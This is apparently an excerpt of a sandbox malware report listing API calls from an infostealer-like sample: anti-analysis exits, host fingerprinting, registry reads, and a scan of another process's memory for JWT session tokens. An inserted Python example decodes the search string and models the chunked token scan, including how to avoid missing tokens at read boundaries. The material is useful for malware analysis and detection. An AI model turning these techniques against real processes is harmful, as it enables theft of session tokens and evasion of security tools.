                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenProcesslstrcpymemset
                                                        • String ID:
                                                        • API String ID: 224852652-0
                                                        • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                        • Instruction ID: 565a4e276bfbe93330fc9b7de39f67b1b0ae380c27d524dc796f14cb51b8a2a2
                                                        • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                        • Instruction Fuzzy Hash: 38518EF1D442189BDB24EBA0DC85BEDB7B4EF54305F2081E8E109A6281DF746A88CF59
                                                        APIs
                                                        • memset.MSVCRT ref: 004140D5
                                                        • RegOpenKeyExA.ADVAPI32(80000001,0082ABB0,00000000,00020119,?), ref: 004140F4
                                                        • RegQueryValueExA.ADVAPI32(?,0082B038,00000000,00000000,00000000,000000FF), ref: 00414118
                                                        • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                        • lstrcatA.KERNEL32(?,0082B248), ref: 0041415B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                        • String ID:
                                                        • API String ID: 2623679115-0
                                                        • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                        • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                        • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                        • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                        APIs
                                                        • memset.MSVCRT ref: 00B3433C
                                                        • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 00B3435B
                                                        • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 00B3437F
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B34389
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B343AE
                                                        • lstrcat.KERNEL32(?,0064A168), ref: 00B343C2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                        • String ID:
                                                        • API String ID: 2623679115-0
                                                        • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                        • Instruction ID: e746a75b4e4d69ed586bd8d640fcd182d52f79de1d8e95f81203994a3b6d5dcc
                                                        • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                        • Instruction Fuzzy Hash: 804189B69401087BDB14FBE0DC46FEE777DAB99300F00459CB61957181EA756B888BE2
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00413588
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • strtok_s.MSVCRT ref: 004136D1
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpystrtok_s$lstrlen
                                                        • String ID:
                                                        • API String ID: 3184129880-0
                                                        • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                        • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                        • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                        • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                        APIs
                                                        • __lock.LIBCMT ref: 0041B39A
                                                          • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                          • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                          • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                        • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                          • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                        • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                        • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2005412495-0
                                                        • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                        • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                        • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                        • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                        APIs
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B39B08
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B39B21
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B39B39
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B39B51
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B39B6A
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B39B82
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B39B9A
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B39BB3
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B39BCB
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B39BE3
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B39BFC
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B39C14
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B39C2C
                                                          • Part of subcall function 00B39AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B39C45
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B21437: ExitProcess.KERNEL32 ref: 00B21478
                                                          • Part of subcall function 00B213C7: GetSystemInfo.KERNEL32(?), ref: 00B213D1
                                                          • Part of subcall function 00B213C7: ExitProcess.KERNEL32 ref: 00B213E5
                                                          • Part of subcall function 00B21377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B21392
                                                          • Part of subcall function 00B21377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B21399
                                                          • Part of subcall function 00B21377: ExitProcess.KERNEL32 ref: 00B213AA
                                                          • Part of subcall function 00B21487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B214A5
                                                          • Part of subcall function 00B21487: __aulldiv.LIBCMT ref: 00B214BF
                                                          • Part of subcall function 00B21487: __aulldiv.LIBCMT ref: 00B214CD
                                                          • Part of subcall function 00B21487: ExitProcess.KERNEL32 ref: 00B214FB
                                                          • Part of subcall function 00B369D7: GetUserDefaultLangID.KERNEL32 ref: 00B369DB
                                                          • Part of subcall function 00B213F7: ExitProcess.KERNEL32 ref: 00B2142D
                                                          • Part of subcall function 00B37AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B2141E), ref: 00B37AE7
                                                          • Part of subcall function 00B37AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B37AEE
                                                          • Part of subcall function 00B37AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B37B06
                                                          • Part of subcall function 00B37B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B37B77
                                                          • Part of subcall function 00B37B47: RtlAllocateHeap.NTDLL(00000000), ref: 00B37B7E
                                                          • Part of subcall function 00B37B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00B37B96
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D31
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B36D4F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B36D60
                                                        • Sleep.KERNEL32(00001770), ref: 00B36D6B
                                                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D81
                                                        • ExitProcess.KERNEL32 ref: 00B36D89
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 2525456742-0
                                                        • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                        • Instruction ID: a8840082b8f9cce6d0c045092c94c82c97dd461d0d86ab8a7ed03445c12dbcdb
                                                        • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                        • Instruction Fuzzy Hash: 41318875A40208BBCB04FBF0DC56FFD73B9AF16301F7055A8B152A2192EF745A04CA62
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                        • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                        • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                        • String ID:
                                                        • API String ID: 2311089104-0
                                                        • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                        • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                        • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                        • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                        • ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                        • LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                        • String ID:
                                                        • API String ID: 2311089104-0
                                                        • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                        • Instruction ID: c985539bf272c63394357cbc607befeca93d23dcca2da9524318bfc343af5bae
                                                        • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                        • Instruction Fuzzy Hash: C6312BB8A00209EFDB14CF94D885BEE77F5FF49700F108198E919A7290C774AA41CFA1
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041C9EA
                                                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                        • __amsg_exit.LIBCMT ref: 0041CA0A
                                                        • __lock.LIBCMT ref: 0041CA1A
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                        • free.MSVCRT ref: 0041CA4A
                                                        • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                        • String ID:
                                                        • API String ID: 634100517-0
                                                        • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                        • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                        • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                        • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                        APIs
                                                        • __getptd.LIBCMT ref: 00B3CC51
                                                          • Part of subcall function 00B3C206: __getptd_noexit.LIBCMT ref: 00B3C209
                                                          • Part of subcall function 00B3C206: __amsg_exit.LIBCMT ref: 00B3C216
                                                        • __amsg_exit.LIBCMT ref: 00B3CC71
                                                        • __lock.LIBCMT ref: 00B3CC81
                                                        • InterlockedDecrement.KERNEL32(?), ref: 00B3CC9E
                                                        • free.MSVCRT ref: 00B3CCB1
                                                        • InterlockedIncrement.KERNEL32(0042B980), ref: 00B3CCC9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                        • String ID:
                                                        • API String ID: 634100517-0
                                                        • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                        • Instruction ID: 5d30191e5092ebf8aa702b229a0226b6c8fcaa1f4fcb3398368a61b85f959d72
                                                        • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                        • Instruction Fuzzy Hash: 55010031A00A24AFC720ABA49845B5DBFE0FF00710FB04296EC1877290CB346881DBD9
                                                        APIs
                                                        • strlen.MSVCRT ref: 00416F1F
                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                          • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strlen$MemoryProcessQueryReadVirtual
                                                        • String ID: @
                                                        • API String ID: 2950663791-2766056989
                                                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                        APIs
                                                        • strlen.MSVCRT ref: 00B37186
                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00B37401,00000000,00420BA8,00000000,00000000), ref: 00B371B4
                                                          • Part of subcall function 00B36E37: strlen.MSVCRT ref: 00B36E48
                                                          • Part of subcall function 00B36E37: strlen.MSVCRT ref: 00B36E6C
                                                        • VirtualQueryEx.KERNEL32(00B37574,00000000,?,0000001C), ref: 00B371F9
                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B37401), ref: 00B3731A
                                                          • Part of subcall function 00B37047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00B3705F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strlen$MemoryProcessQueryReadVirtual
                                                        • String ID: @
                                                        • API String ID: 2950663791-2766056989
                                                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction ID: 0e496e9f388924f06824b9c343f7b0745de73f62dfaad9305ba0afabe6d2235f
                                                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                        • Instruction Fuzzy Hash: 6151F4B1A04109ABDB18CF98D981AEFB7F6FF88300F208559F915A7240D734AA11DBA5
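Added example, not part of the Joe Sandbox report or of the sample's own code. The two listings above are one routine seen in both dumps: strlen on a needle, VirtualQueryEx to walk another process's regions, and a helper that calls ReadProcessMemory 0x64000 bytes at a time. The needle handed down the call chain appears as a hex dump in the first listing; decoded, it is the base64url JWT header `{ "typ": "JWT", "alg": "EdDSA" }`, so the routine is hunting for session tokens carrying that header in a foreign process (the report does not say which process). The Python below decodes that argument and models the read loop over constructed in-memory regions instead of the Win32 calls, covering the case the chunked reads make easy to miss: a token that starts in one read and ends in the next. Region base addresses and the token filler are made up for the demo.

```python
import base64
import json

# Hex dump copied from the ??_U@YAPAXI@Z argument list in the listing above.
NEEDLE_HEX = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 "
              "4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")

# 0x64000 is the read length passed to ReadProcessMemory at 00416DF8 / 00B3705F.
CHUNK = 0x64000


def decode_needle(hex_dump):
    """Turn the report's space-separated hex into the raw search string."""
    return bytes.fromhex(hex_dump.replace(" ", ""))


def decode_jwt_segment(segment):
    """Base64url-decode one JWT segment (padding restored) and parse it as JSON."""
    padded = segment + b"=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def scan_regions(regions, needle, chunk=CHUNK):
    """Search (base_address, bytes) regions the way a VirtualQueryEx /
    ReadProcessMemory loop does: `chunk` bytes per read, carrying the last
    len(needle)-1 bytes of the previous read forward so a match that
    straddles two reads is still found. Returns absolute hit addresses."""
    overlap = len(needle) - 1
    hits = []
    for base, data in regions:
        carry, carry_addr = b"", base
        for offset in range(0, len(data), chunk):
            window = carry + data[offset:offset + chunk]   # window starts at carry_addr
            pos = window.find(needle)
            while pos != -1:
                hits.append(carry_addr + pos)
                pos = window.find(needle, pos + 1)
            carry = window[-overlap:] if overlap else b""
            carry_addr += len(window) - len(carry)
    return sorted(set(hits))


def build_sample_regions(needle):
    """Constructed stand-in for a target process's memory (not a real dump):
    two committed regions, one token placed so the needle crosses the
    0x64000 read boundary and another sitting well inside a region."""
    token = needle + b".eyJjb25zdHJ1Y3RlZCI6dHJ1ZX0.c2lnbmF0dXJl"  # constructed filler, not a real token
    region1 = bytearray(CHUNK + 0x1000)
    start = CHUNK - 10                   # first 10 needle bytes land in read 1, the rest in read 2
    region1[start:start + len(token)] = token
    region2 = b"\x00" * 64 + token + b"\x00" * 64
    return [(0x00400000, bytes(region1)), (0x7FF00000, region2)]


def find_tokens():
    """Decode the needle, show what it is, and locate it in the sample regions."""
    needle = decode_needle(NEEDLE_HEX)
    header = decode_jwt_segment(needle)
    hits = scan_regions(build_sample_regions(needle), needle)
    return needle, header, hits


if __name__ == "__main__":
    needle, header, hits = find_tokens()
    print("needle:", needle.decode())
    print("decoded JWT header:", header)
    print("hits:", [hex(h) for h in hits])
```

The carry of len(needle)-1 bytes is what makes the chunked walk equivalent to a single search over the whole region; a scanner that forgets it (or the real one, if it does) silently misses any token that happens to sit on a 0x64000 boundary, which is worth remembering when reproducing the behaviour to check what the sample can and cannot find.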
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: *n@$*n@
                                                        • API String ID: 1029625771-193229609
                                                        • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
